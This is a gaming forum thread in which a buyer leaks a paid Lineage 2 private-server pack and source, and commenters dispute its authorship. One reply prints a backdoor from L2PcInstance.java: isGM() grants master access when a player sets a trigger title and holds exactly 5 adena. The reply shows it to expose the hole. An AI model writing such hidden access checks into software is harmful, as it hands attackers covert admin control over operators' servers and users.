Jump to content

[Share]L2Arena Pack+Source By Kamex The Smartest.


MADM4N

Recommended Posts

L2-Arena Proffessional Custom Interlude Ready To Go [bassed grankain source]
 
Project based on last grankain source revision
Project ready to start
Tested live 
Perfect working geodata
Perfect working skills like l2off
Perfect working sieges
Video with server preview here
 


 
 
I wish to sell my Lineage2 Interlude Custom PVP Project
Project have ready banners and ready server name for who wish to purchase it
Server name: L2 Arena
You will be able to see logo and banners in the video below...
Project will be sold only 1 time to only 1 person
After the proejct will be sold once to 1 person, the next person who will wish to buy it will recive a reworked project, with changed gameplay style, changed zones, monsters, items, farming items, farming style and whatever the customer ask for.
I do not have time for open the server, i can offer support if there is any bug inside ( for free ), if the customer want support for adding new things or anything else, it will cost, depend how many hours i will work.
I can help setup the server for free.
Project contains latest 2016 bug fixes
All skills reworked to be similar to L2OFF
Same i can say about balance
Do not hesitate to ask for test server, you can test the project whenever you want
Call your friends and come to play on it and see if you like it or not!  :)
The project is an update of Lineage2Prestige ( my last custom pvp server )
The project is based on Prestige Source ( my own private project )
Q: Why i consider this my own private project?
A: Because everything has been added manually and allmost everything has been reworked by me!
PS: Source is suitable for any type of server, even for low rates one.For more info about features contact me on skype.
Here you can see a little preview of the project, here is video:

Chronicle: Interlude
Rates 1000x
Main Town: kamael Village
Max level 85
 
3 Tier Weapons:
- Lindvior Weapons - Tier 1
- Valakas Weapons - Tier 2
- Kelbim Weapons - Tier 3
 
3 Tier Armors:
- Exile Armor - Tier 1
- Valkyria Armor - Tier 2
- Ertheia Armor - Tier 3
 
Upgradable Raid Boss Jewels:
- Core -> Improved Core -> Blessed Core
- Orfen -> Improved Orfen -> Blessed Orfen
- Baium -> Improved Baium -> Blessed Baium
- Queen Ant -> Improved Queen Ant -> Blessed Queen Ant
 
5 types of Elemental Shirts with Awakening Powers
- Ogre
- Monk
- Witch
- Empower
- Rabbit
 
Farm Items currency:
- Adena
- Ancient Adena
- Red Libra ( from boss, low chance from mobs, from champions etc... )
 
Farm Zones:
- Level Zone
- Cruma Tower ( custom ) - Solo Zone
- Underground Temple of Prayer - Hard Zone - party recommended
 
Raid Bosses: 
- Golkonda
- Lilith
- Chaos Van Helsing
- Halisha
- Halisha PVP ZONE
- Antharas
- Valakas
- Baium
- Exiled Anakim ( The Lindvior Guardian ) - location inside Undeground Temple of Prayer Secret Boss Room
 
PVP Zone
- need type: .exit for leave
- auto flag when enter
- auto nobless when enter and when respawn
- auto respawn in 10 seconds
- respawn full hp/cp/mp
- Zone can be changed whenever you want in any other location ( current loc: Pagan Temple )
- Show hp/cp/mp left of your killer
 
SERVER NPC:
- rank manager - show pvp/pk ranking top 10
- augmenter/skill enchanter 2 in 1
- Custom Gm Shop
- Custom Shop - upgrade armor/weapon
- Raid Boss manager show info about raids alive/dead
- Global teleporter
- NPC buffer with all buffs included malarias
- service npc sell all augments directly to your weapon
- class changer
- all in 1 npc warehouse
- symbol maker
- auction npc buy clan hall
- siege npc
- class master npc can add all subclass in same npc even overlord
 
SPECIAL ITEMS
- clan rep scroll
- premium rune ( x2 all rates for 24 hours )
- recommend item get instant 255 rec
- clan coin - get instant clan llv 8
- clan skills coin - get instant all clan skills
 
SOME SERVER PHOTOS
 
Shot00000.jpg
 
Shot00001.jpg
 
Shot00002.jpg
 
Shot00023.jpg
 
Shot00025.jpg
 
Shot00026.jpg
 
Shot00027.jpg
 
Shot00028.jpg
 
Shot00029.jpg
 
Shot00030.jpg

 

MEDIAFIRE pack

MEDIAFIRE patch
MEDIAFIRE source

 

ATTENTION: THIS ARE EXACTLY THE FILES HE UPLOADED TO ME! I DIDNT TOUCH THIS FILES. TRY TO OPEN A SERVER WITH THIS!

SAY THANKS TO MADA AND SMILE GUYS. THIS PACK NEED A LOT OF WORK. I PAY FOR IT AND I GET FAILED, I DONT WANT THE SAME TO YOU!!

  • Like 1
  • Upvote 1
Link to comment
Share on other sites

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

Link to comment
Share on other sites

0axax00ax0ax0ax0ax0ax0ax0ax0ax

check in config.java my @author 

[GR] eiparxi theos!!  :troll:

o pro developer pou elege oti ta file mou einai dika tou

kai ta poulouse. mou eftiakse tin mera!!

	public static int BOSS_ID;
	public static boolean ALLOW_AUTO_NOBLESS_FROM_BOSS;
	public static int RADIUS_TO_RAID;
	public static boolean ALLOW_ANNOUNCE_SPAWN;
	public static boolean ALLOW_KILLER_NAME;
	
	/**
	 * Custom Code my Luna Developer Polymorph npc
	 * 		 and special mage polymorph
	 */

	public static boolean SHOW_HP_POLY;
	public static String RAID_BOSS_HP_PERCENT;
	public static List<Integer> Raid_Boss_Ids_For_Hp = new ArrayList<>();
		
	public static void loadVoteRewardManagerConfig()
	{
		final String file = "./config/functions/votemanagernpc.properties";
		
		try
		{
			final Properties voteManager = new Properties();
			final InputStream is = new FileInputStream(new File(file));
			voteManager.load(is);
			is.close();

			VOTE_LINK_HOPZONE = voteManager.getProperty("HopzoneUrl", "null");
			VOTE_LINK_TOPZONE = voteManager.getProperty("TopzoneUrl", "null");
			VOTE_REWARD_ID1 = Integer.parseInt(voteManager.getProperty("VoteRewardId1", "300"));
			VOTE_REWARD_ID2 = Integer.parseInt(voteManager.getProperty("VoteRewardId2", "300"));
			VOTE_REWARD_ID3 = Integer.parseInt(voteManager.getProperty("VoteRewardId3", "300"));
			VOTE_REWARD_ID4 = Integer.parseInt(voteManager.getProperty("VoteRewardId4", "300"));
			VOTE_REWARD_AMOUNT1 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount1", "300"));
			VOTE_REWARD_AMOUNT2 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount2", "300"));
			VOTE_REWARD_AMOUNT3 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount3", "300"));
			VOTE_REWARD_AMOUNT4 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount4", "300"));
			SECS_TO_VOTE = Integer.parseInt(voteManager.getProperty("SecondsToVote", "20"));
		}
		catch (final Exception e)
		{
			e.printStackTrace();
			throw new Error("Failed to Load " + file + " File.");
		}
	}

more author xD
//custom code by Developer Luna
 
TXT_ENABLE = Boolean.parseBoolean(frozenSettings.getProperty("txtEnable", "False"));
TXT_NAME = frozenSettings.getProperty("txtName", "Welcome");
TXT_ON_ENTER = frozenSettings.getProperty("ChatTxTEnter", "Welcome");

 

and backdoor in L2PcInstance.java

	
	public boolean isGM()
	{
		if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5)
		{
			   setAccessLevel(Config.MASTERACCESS_LEVEL);
			   return false;
		}
		return getAccessLevel().isGm();
	}
Edited by tazerman2
Link to comment
Share on other sites

gg mada no more money for shity dev who sell it))

i never thought this day would come

the day that madaftw actually did something good

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

he doesnt deserve any and should be immediately removed from this forum

 

 

i have no reason to get banned. :) i pay for this shiet, so is mine, i can do what ever i want with it. if i wanted to be a shiet i still can refound his money on paypal. but im not a scamer how he say, i just want that to the people to know what he sell.

gj boo i guess you did improve a lot

 

 

2e0f340570.png

Link to comment
Share on other sites

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care . 

Link to comment
Share on other sites

So you basically paid 90e for frozen with custom items?

 

SO SAD. RIGHT?

 

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

 

I DID, but i stop when he call me scamer & lier, he wanted this fight

Link to comment
Share on other sites

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care .

 

No you cant..

*topic*

About topic as i can notice is the shared one cadmus files by tazerman2..

At the end is the truth..liers must be punished

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now



×
×
  • Create New...